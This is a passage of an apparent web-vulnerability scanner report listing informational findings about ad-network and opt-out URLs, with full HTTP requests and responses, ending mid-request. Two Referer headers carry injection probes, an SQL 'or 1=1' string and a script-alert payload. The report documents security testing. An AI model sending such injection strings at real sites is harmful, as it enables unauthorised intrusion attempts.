HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 16:40:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 12178
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#000000}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.misquincemag.com/%26hl%3Den%26client%3Dca-pub-9503572870358044%26adU%3DUPrinting.com/Invitations%26adT%3DMake%2BBirthday%2BInvitations%26adU%3Dwww.apps.facebook.com/BeKnown%26adT%3DIntroducing%2BBeKnown%25E2%2584%25A2%26adU%3DTinyPrints.com/CustomCards%26adT%3DCustom%2BCards%2B%2526amp%253B%2BStationary%26gl%3DUS&amp;usg=AFQjCNFpb6VUndGHfCrn69XSZ2UproypEg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
18.94. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9503572870358044&output=html&h=250&slotname=3032637931&w=300&lmt=1316312780&flash=10.3.183&url=http%3A%2F%2Fwww.quickandsimple.com%2F&dt=1316294779987&bpp=90&shv=r20110907&jsv=r20110914&correlator=1316294780139&frm=4&adk=3286472499&ga_vid=514748641.1316294780&ga_sid=1316294780&ga_hid=996858722&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=354&xpc=nXbZZpuMrJ&p=http%3A//www.quickandsimple.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 16:36:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 11918
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 16:36:13 GMT

<!doctype html><html><head><style>a{color:#0b9993}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.quickandsimple.com/%26hl%3Den%26client%3Dca-pub-9503572870358044%26adU%3DLivingFrugal.com%26adT%3DPrintable%2BCoupons%26adU%3DShopAtHome.com%26adT%3DFree%2BToilet%2BPaper%2BCoupons%26adU%3Dmyfinances.com%26adT%3DFree%2BGrocery%2BCoupons%26gl%3DUS&amp;usg=AFQjCNH1HpRlxv7LtA8grHveMX4dh41Qow" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
18.95. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9503572870358044&format=300x250_as&output=html&h=250&w=300&lmt=1316312806&channel=6928715784&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=007d97&color_text=007d97&color_url=007d97&flash=10.3.183&url=http%3A%2F%2Fwww.seventeen.com%2F&dt=1316294804828&bpp=598&shv=r20110907&jsv=r20110914&correlator=1316294806581&frm=4&adk=432628463&ga_vid=746533379.1316294807&ga_sid=1316294807&ga_hid=640611289&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=helvetica%20neue&dfs=14&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=2919&xpc=ma7imvjv5h&p=http%3A//www.seventeen.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 16:39:17 GMT
Server: cafe
Cache-Control: private
Content-Length: 11685
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#007d97}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.seventeen.com/%26hl%3Den%26client%3Dca-pub-9503572870358044%26adU%3DLorealParisUSA.com/Beauty-Tips%26adT%3DFashion%2BBeauty%2B2011%26adU%3Dwww.RockstarGames.com/MaxPayne3%26adT%3DNew%2BMax%2BPayne%2B3%2BGame%26adU%3Dwww.randomhouse.com/You-Against-Me%26adT%3DYou%2BAgainst%2BMe%26gl%3DUS&amp;usg=AFQjCNFpFI9QvGsQkG16r5VukTZBmKka-g" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
18.96. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout?naichk&nocache=0.2286122 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:43:37 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...
18.97. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout?oochk HTTP/1.1
Host: img.pulsemgr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: p=OPTOUT

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:22:57 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...
18.98. http://info.yahoo.com/nai/nai-status.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.yahoo.com
Path:   /nai/nai-status.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/nai-status.html?nocache=0.7688409 HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 17:37:22 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5244

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...
18.99. http://info.yahoo.com/nai/nai-verify.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.yahoo.com
Path:   /nai/nai-verify.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/nai-verify.html?optoutverify=true&opter=nai HTTP/1.1
Host: info.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: B=8d7n6ot73ufk2&b=4&d=4auM3vprYH0wsQ--&s=sl; AO=o=1

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 17:22:48 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5308

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...
18.100. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/OptOut.php?service=outNAI&nocache=0.596117 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: xltl=eJxdkMFqwzAMht%252FF94AlW5LlntI2Y91C2ZK1223EcQylx7HDGHv3pYFechPi%252B%252FV%252FaIgSf7%252Bii%252BZ02JvNPGE0Fihk9hywWE4lqGCyOGoQUvJZF25O1I%252F3RC4DALBTH2ByOhb1pMKch2xpwnTjAKL5vuTPHq3vmqUMKBogZ9UDIIsC2jV5OO6WEo4muVmCMlVMBStvS6gGRa3GxJhCzuMw3dXabk5dIgiCFZLVzXr%252FceNQotnVTd%252B0D%252F27hevr08%252B53T6f3q7n7Dq%252FNqlfjstKo0F0loGRiFhl%252FpaI2fz9AwjiVPM%253D; BFF=eJzllk2PmzAQhv8Lv8AfgIFckjqqirTQaBOt0r1Ue%252Bx5j9v%252B99rYgQHmNermVOXqZ778wnjmrSl18%252FHeSNFkFynyfl%252FXtcp2vxpplNg5oJus%252B95fvj39%252BPnSnttLtntrapH0KeI5DUNtNQNeSRBZTkFeydHMVlPgjM9K5G1vfwvpaTHQsrqlmCgFagRLHzOSWKsk%252Ba9TrcE61npdJB1tNQUygMMXGqVypLwBcja31pTEO3fH8%252BzOU6kTpUCNYOljRkLtY5rLc59IEyiTxgGQxhEmTdu%252FJNIEyqRxAKRxhElzOF5jmpJJEyiTxoGljxnJIlDXHfdlLQqVE6CHc2ppyM3UXsrK5DW6uaIgn26%252B9ppHXZVBndewmpekK%252BnajP9WHC1n7kooKSjWk%252FOKGdKoSTEsEsOmxLAbYtiUGHZLDJsUw6bFsGtG%252B1v5365C%252Fa2YXzX2d8UIMTRrQt7AGYV8M0N5Y1Qor3eG8t5KgvIOqaG80R3J652RvEOvK%252FTgBIpfgoIRYvDRWN7AGYV8TChvjArl9c5Q3ltJUN4h9YrWTXY8PHX%252BojRqHo4Xhm3%252FlTN0x1y%252BU596f09gmjiA3t9Tvwj03LkruZFp6OfTwzkqCP8Gp2VHzAsqOM29D6s5Dar5WlZufz6zQn12X8JrEdyA%252FmndMcKA1SaS9GqDN5iNZQXvJBvrB94yNhYKvDfAFWFzI3jEwf948%252F2OMf540%252FqOofyfzV4waTfmKh6fcFJuDMZ75l9qzP0FWcbuBw%253D%253D; TFF=eJydlDtyxCAMhu%252ByJ5CEQYCbPUZaFy4yky7pdvbuwS8MNk4kFx6w5%252F%252Bs1w9D7Hx8fUek%252BEDonoTwDCHQox8ixddnxD49TJAW2Lbvkx4nvTnoqV9eS44zJiPSCt2FkrIS3frv8WP8Gn7G479xVbsDkauwzarxH%252F2x6llf15AzWzEpMUWihIChRmaO%252Faaftme9reMs%252BirOynHGZET6dprH1t19HulTmZPFVg0%252Be2ranvXHGvzJISvHGZMS2xyhOfd2ZoVeHIczps2MfNORwLveN%252FRHR876ajYrxxmTEnMk654AZorkr85YcX4XF3Q7h%252Bi5C7fIEAzTHdIFsNSJybrKu5y9yTkxZ4veGI%252Fp3hCjZkcJGjfxFciZkxFptU7Rh%252FkQQ%252BuuWLg%252F9Kp%252BF5y435wxVSRjdRXtetX52jjlKakjqrxecLre75zc6zXHmpktmNSvSa71ESr9irqeccZkxPsXb690Dg%253D%253D; EVX=eJyVkEEOwjAMBP%252FCC7xOHCfuY6wee%252BaI%252BndMSxFBhZabpVmvdz2a2m2y1poMo5XHTMPVUO2CotXVmbJTYhfHZZgML1ppowKnlfJGlREUUpwoeVlp6umyS9ho%252FqBJ3qns7OJJ56VAjQLcFdgNgR9nwgiomltY4cgqxKWRcD4pjoglpOn%252FiP2f%252BKBAqoDifCj9Iu2N5zs3DosS

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT; path=/; domain=.exelator.com
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=exelator.com
Content-type: text/html
Date: Sat, 17 Sep 2011 16:48:18 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2
Content-Length: 96

<img src="http://ad.yieldmanager.com/unpixel?id=199372&data=999999&" width="1" height="1"></img>
18.101. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Date: Sat, 17 Sep 2011 16:28:17 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');
18.102. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2 HTTP/1.1
Host: loadus.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: xltl=eJxdjjELAjEMRv9L94MkbdImTqKCgjgoztJeruAsTuJ%252F9zxwcfuG93hfNbbXw6KF62EbVvMiC4BcXJIU6iCtF83UgEYtmZWT68LNxnr%252FM7xXRJSoqeAUdeyaWLOIVweeqH05RAvPu98uBOm8W2LIFpAjaEIkyYoE%252F%252BThtFkiYqHF%252BQQ7D8KdhgS9DFVJh7EJteI%252B1ul37XierbthJoTMvHp%252FALJ%252BOtY%253D; BFF=eJzllb9OwzAQxt8lT%252BB%252FtR13aXEGIpEg0agqXVBHZkbg3XESNz4nPkeUja7%252B3d1nf8ndXYyQ5vPDUGKKjhLR7sqyZMX23VDFyNYBbormue0en17fjvWh7ortxUiRzdn4c1gGxvIEOIMiVIYiZ3AUxXIIXPCBEVG39ovQnm4GKvVVIlAI2ATmOWoi%252Fq4U6J%252FCXcdof9fTTHSK5RDQEewfYBXtiLwCcBZHc0j8m5vqEL05XDVQCNgE5jlqIjDey3QvbUZmpAkZBxAZRxIydXvMyIw0IeMAIuNIQmZfnbyMTMiMNCHjwDxHTWRWqGmqnSzJhgkA%252BHAOIxV4GdtRqpUosZczCER4%252BTIrrrq4BkxeQh1fiWvq2iz9rVJURumMMEog5iF5wRRo1KwZFjPD5sywK2bYnBl2zQybNcPmzbBLBvub9b%252BdxvqbJX5V3986YcTQrBl7R55wqG9m1F5fFbW3T0btvV4JtXeQRu316Zi9fXLMvm%252FZSLeuH3zLoAvlV9tDEYVsCk%252FymwJfCCuzHx%252FxK9McH9or8xkfw%252BjEXR2w9zhH729c%252FmEq%252Fr%252Fh9wMIK9ZV; TFF=eJydlDtyhDAMQO%252ByJ5Dkj2TTcIy0FBQ7ky7pMnv32CwY%252F8g4FIwNvIckJFi8Iv%252Fz5ZH8A0HPhDA75%252BgxLT7ceHqcwsEEYYFj%252B2p4jLyqeJrep7nHSRszwgr6gqREot2fvX6sn8v3Wj8bd1pVRqrCdKsO0J98XfXGlzWkzHZt1IiRKCigqJOZZTn4uG15U8Z580Wc3eOkjRnhWtUPK00%252F6pwM9mqQNFNx2%252FJ1DdJMyO5x0kaNo4%252FQ7Xs%252Fs4wfjsNJ%252B29mJN2JBD556fD1RG582RuRfCKlnshLY4tk7AygYiS5%252Bsay7xc3T58eorB2t0znFNMd0zowpIfNssq7nrnp2WHPZO9GCYb%252FxrCqTpWg8ye%252BEjl5Y0ZYjR0iX78BIaK%252F; EVX=eJyNjjsKwzAQBe%252FiE%252Bxbab86zOLSdcrgu0dOcCCQQt2DGZi3p%252BbzyIiQsWe7No1HwnODmpcVUy9qXFLYxpH4UqebCoo%252BlG9qjEkhWkSt9KLnO%252BMzg5%252FMfxVw67Eoa5BwX5TnCV090RwwLNnnC388VDQ%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:54:26 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-4
Content-Length: 683

<HTML><BODY><img src="http://map.media6degrees.com/orbserv/hbpix?pixId=6249&pcv=47&ptid=102&tpv=00&tpu=0158d64682f06bf8972b02c9875954d9" width="1" height="1"></img><img src="http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9" width="1" height="1"></img><img src="http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=79&partnerUID=0158d64682f06bf8972b02c9875954d9&sscs_active=1" width="1" height="1"></img><img src="http://cm.g.doubleclick.net/pixel?nid=exelate&j=0" width="1" height="1"></img><img src="http://pixel.mathtag.com/data/img?mt_id=100738&mt_dcid=382&v1=&v2=&v3=&s1=&s2=&s3" width="1" height="1"></img>
...[SNIP]...
18.103. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417 HTTP/1.1
Host: loadus.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
